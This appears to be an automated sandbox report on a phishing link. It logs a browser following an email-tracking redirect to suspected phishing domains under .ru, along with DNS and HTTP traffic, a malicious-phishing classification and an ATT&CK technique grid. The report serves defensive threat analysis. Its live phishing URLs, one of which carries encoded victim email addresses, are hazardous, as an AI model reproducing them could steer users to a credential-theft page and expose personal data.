    Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/b/flow/ov1/2106713247:1734621222:Ju1S4rINYs2w6jhaMJAc6wI0nSHHPD5uYn3o5b92WHs/8f48a7cc7ace41d9/.H3W3k_QuubbPTTWkYw5VKDIKNmMDBqT.SjUBhnSxnM-1734624549-1.1.1.1-Nr6MbTJA2B5hNY5I5gYF2L0m47RDXC_3R6cVJGZX96s5UAuGLPsnAnpIY.IFyYCK HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /450651641146885713188409uEDZBXeukDSKEJVJYYHNXWLRZMBRXSICETHCSJUGTTQLXNSIAORTBKCRSEOOR HTTP/1.1Host: 9szabznwysu0nqd7jsalucgri0zuorxftvkbcicssqn4kliejrjad15peym.avzcafe.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Origin: https://wv.itzraterbi.ruSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://wv.itzraterbi.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: GET /450651641146885713188409uEDZBXeukDSKEJVJYYHNXWLRZMBRXSICETHCSJUGTTQLXNSIAORTBKCRSEOOR HTTP/1.1Host: 9szabznwysu0nqd7jsalucgri0zuorxftvkbcicssqn4kliejrjad15peym.avzcafe.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficDNS traffic detected: DNS query: go.eu.sparkpostmail1.com
    Source: global trafficDNS traffic detected: DNS query: berazel.com
    Source: global trafficDNS traffic detected: DNS query: www.google.com
    Source: global trafficDNS traffic detected: DNS query: logo.clearbit.com
    Source: global trafficDNS traffic detected: DNS query: pbs.twimg.com
    Source: global trafficDNS traffic detected: DNS query: wv.itzraterbi.ru
    Source: global trafficDNS traffic detected: DNS query: code.jquery.com
    Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
    Source: global trafficDNS traffic detected: DNS query: 9szabznwysu0nqd7jsalucgri0zuorxftvkbcicssqn4kliejrjad15peym.avzcafe.ru
    Source: global trafficDNS traffic detected: DNS query: www.microsoftonline.com
    Source: global trafficDNS traffic detected: DNS query: google.com
    Source: unknownHTTP traffic detected: POST /recaptcha/api2/reload?k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YE HTTP/1.1Host: www.google.comConnection: keep-aliveContent-Length: 9204sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-protobufferAccept: */*Origin: https://www.google.comX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIkqHLAQj2mM0BCIWgzQEIucrNAQiJ080BGMvYzQEY642lFw==Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://www.google.com/recaptcha/api2/bframe?hl=en&v=nhamhfA6n_hKMa_Y7UpFyA37&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YEAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 1251date: Thu, 19 Dec 2024 16:08:17 GMTserver: LiteSpeedplatform: hostingerstrict-transport-security: max-age=31536000; includeSubDomains; preloadx-xss-protection: 1; mode=blockx-content-type-options: nosniffalt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 16:09:13 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wnW%2BGYblX0Kzjphj1%2F0sP%2BY%2FLrMq%2FJuzzxlY%2FXCUapaLm0ujBdHHn0RySUC68qWD4tqzWYDFrUcvc1NMsLhZGdmyw8pFXgJqiM2S1qDotNZyr5WlboOoTG0necTOLg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=921&min_rtt=854&rtt_var=287&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2824&recv_bytes=2232&delivery_rate=4548931&cwnd=252&unsent_bytes=0&cid=eb3b0fe9fc895645&ts=402&x=0"CF-Cache-Status: MISSServer: cloudflareCF-RAY: 8f48a7dd1fee1a13-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=1969&min_rtt=1966&rtt_var=744&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1895&delivery_rate=1462925&cwnd=169&unsent_bytes=0&cid=1dee2a985b208f8f&ts=9877&x=0"
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 16:09:16 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: MPI97tjJFVJu5SLtfWOVu3RcMHyLZ4GPkcg=$F2I4+nl/0IS8B/hWServer: cloudflareCF-RAY: 8f48a7f61e0e4259-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 16:09:22 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: rapf1B4mYQ9vXkQlkLoWNRbur6mWDD1AQiQ=$7cyPYaNSUb4f0wwsServer: cloudflareCF-RAY: 8f48a81d4bee4368-EWRalt-svc: h3=":443"; ma=86400
    Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 19 Dec 2024 16:09:27 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: fpy3W7T6d3nI/+cwUgAq9t1nxMpeoTNJJOM=$K9PMqH4igIYG/cAHServer: cloudflareCF-RAY: 8f48a83c9ac08ccd-EWRalt-svc: h3=":443"; ma=86400
    Source: chromecache_104.1.dr, chromecache_94.1.dr, chromecache_107.1.drString found in binary or memory: https://cloud.google.com/contact
    Source: chromecache_104.1.dr, chromecache_94.1.dr, chromecache_107.1.drString found in binary or memory: https://cloud.google.com/recaptcha-enterprise/billing-information
    Source: chromecache_104.1.dr, chromecache_94.1.dr, chromecache_107.1.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#are-there-any-qps-or-daily-limits-on-my-use-of-reca
    Source: chromecache_104.1.dr, chromecache_94.1.dr, chromecache_107.1.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#localhost_support
    Source: chromecache_104.1.dr, chromecache_94.1.dr, chromecache_107.1.drString found in binary or memory: https://developers.google.com/recaptcha/docs/faq#my-computer-or-network-may-be-sending-automated-que
    Source: chromecache_107.1.drString found in binary or memory: https://play.google.com/log?format=json&hasfast=true
    Source: chromecache_107.1.drString found in binary or memory: https://support.google.com/recaptcha
    Source: chromecache_104.1.dr, chromecache_94.1.dr, chromecache_107.1.drString found in binary or memory: https://support.google.com/recaptcha#6262736
    Source: chromecache_104.1.dr, chromecache_94.1.dr, chromecache_107.1.drString found in binary or memory: https://support.google.com/recaptcha/#6175971
    Source: chromecache_104.1.dr, chromecache_94.1.dr, chromecache_107.1.drString found in binary or memory: https://support.google.com/recaptcha/?hl=en#6223828
    Source: chromecache_104.1.dr, chromecache_94.1.dr, chromecache_122.1.dr, chromecache_107.1.dr, chromecache_93.1.drString found in binary or memory: https://www.google.com/recaptcha/api2/
    Source: chromecache_104.1.dr, chromecache_94.1.dr, chromecache_107.1.drString found in binary or memory: https://www.gstatic.c..?/recaptcha/releases/nhamhfA6n_hKMa_Y7UpFyA37/recaptcha__.
    Source: chromecache_122.1.dr, chromecache_124.1.dr, chromecache_93.1.dr, chromecache_96.1.drString found in binary or memory: https://www.gstatic.com/recaptcha/releases/nhamhfA6n_hKMa_Y7UpFyA37/recaptcha__en.js
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
    Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
    Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
    Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
    Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
    Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
    Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701
    Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
    Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
    Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
    Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
    Source: classification engineClassification label: mal52.phis.win@25/91@53/16
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1980,i,19504709162345292,12336163837026692061,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://go.eu.sparkpostmail1.com/f/a/lgobNkIfvQXGgmbryxpFvQ~~/AAGCxAA~/RgRpPCorP0QoaHR0cHM6Ly9iZXJhemVsLmNvbS93ZWxsbmVzcy9zb3V0aC9pbmRleFcFc3BjZXVCCmdVK6VZZ3GvOmFSFmV0aGFubG9nYW40M0BnbWFpbC5jb21YBAAAAAE~#a3RhdHJvZUBob3VzaW5nY2VudGVyLmNvbQ=="
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2000 --field-trial-handle=1980,i,19504709162345292,12336163837026692061,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
    Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
    Browser Extensions
    1
    Process Injection
    1
    Masquerading
    OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
    Encrypted Channel
    Exfiltration Over Other Network MediumAbuse Accessibility Features
    CredentialsDomainsDefault AccountsScheduled Task/Job1
    Registry Run Keys / Startup Folder
    1
    Registry Run Keys / Startup Folder
    1
    Process Injection
    LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
    Non-Application Layer Protocol
    Exfiltration Over BluetoothNetwork Denial of Service
    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)Obfuscated Files or InformationSecurity Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
    Application Layer Protocol
    Automated ExfiltrationData Encrypted for Impact
    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin HookBinary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
    Ingress Tool Transfer
    Traffic DuplicationData Destruction
    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


    windows-stand
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    No Antivirus matches
    NameIPActiveMaliciousAntivirus DetectionReputation
    d26p066pn2w0s0.cloudfront.net
    13.227.8.65
    truefalse
      high
      a.nel.cloudflare.com
      35.190.80.1
      truefalse
        high
        google.com
        172.217.17.78
        truefalse
          high
          code.jquery.com
          151.101.130.137
          truefalse
            high
            dualstack.twimg.twitter.map.fastly.net
            199.232.168.159
            truefalse
              high
              cdnjs.cloudflare.com
              104.17.25.14
              truefalse
                high
                challenges.cloudflare.com
                104.18.94.41
                truefalse
                  high
                  9szabznwysu0nqd7jsalucgri0zuorxftvkbcicssqn4kliejrjad15peym.avzcafe.ru
                  172.67.130.58
                  truefalse
                    high
                    www.google.com
                    142.250.181.132
                    truefalse
                      high
                      berazel.com
                      151.106.103.155
                      truefalse
                        high
                        go.eu.sparkpostmail1.com
                        52.19.163.183
                        truefalse
                          high
                          wv.itzraterbi.ru
                          172.67.163.118
                          truetrue
                            unknown
                            pbs.twimg.com
                            unknown
                            unknownfalse
                              high
                              www.microsoftonline.com
                              unknown
                              unknownfalse
                                high
                                logo.clearbit.com
                                unknown
                                unknownfalse
                                  high
                                  NameMaliciousAntivirus DetectionReputation
                                  https://logo.clearbit.com/housingcenter.comfalse
                                    high
                                    https://www.google.com/recaptcha/api2/payload?p=06AFcWeA6QB-xLWne_hEDWfQLtaaXIAmjra0Yu8cyWFqHWUIvK-sIL_JWaAR1nScLYHenHKcYJitr0hKm3HAXhFbXc_EKg4LBFbKroGCMf4Ru57BPA8nbWyamUlibCqmSl5FetcxEu7XgmTKmQ53DTV7WLK390J0d3liYPbUPlChD8XXJTZxLF0W65AgR-UzNdXgTinnpnX1gU&k=6LdawZgqAAAAAL58R5MYGFbfYTdt1-Ru8R1Kn_YEfalse
                                      high
                                      https://code.jquery.com/jquery-3.6.0.min.jsfalse
                                        high
